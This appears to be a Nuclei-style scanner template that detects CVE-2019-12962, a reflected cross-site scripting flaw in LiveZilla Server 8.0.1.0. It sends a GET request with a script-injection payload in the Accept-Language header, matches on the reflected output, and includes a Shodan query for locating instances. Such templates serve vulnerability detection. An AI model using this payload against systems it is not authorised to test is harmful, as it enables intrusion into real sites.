id: CVE-2019-12962 info: name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting author: Clment Cruchet severity: medium description: | LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. remediation: | Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49669 - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-12962 cwe-id: CWE-79 epss-score: 0.20689 epss-percentile: 0.95827 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: livezilla product: livezilla shodan-query: http.html:LiveZilla tags: xss,edb,packetstorm,cve,cve2019,livezilla http: - method: GET path: - '{{BaseURL}}/mobile/index.php' headers: Accept-Language: ';alert(document.domain)//' matchers-condition: and matchers: - type: word part: body words: - "var detectedLanguage = ';alert(document.domain)//';" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a0047304502210095aaef35754584576962cf866806037e2c83cc6db63fa9785387eea487e81fd00220214bba6cd12595c1de2566c469ce083ae512803a8fbde394378dab2d2858dccc:922c64590222798bb761d5b6d8e72950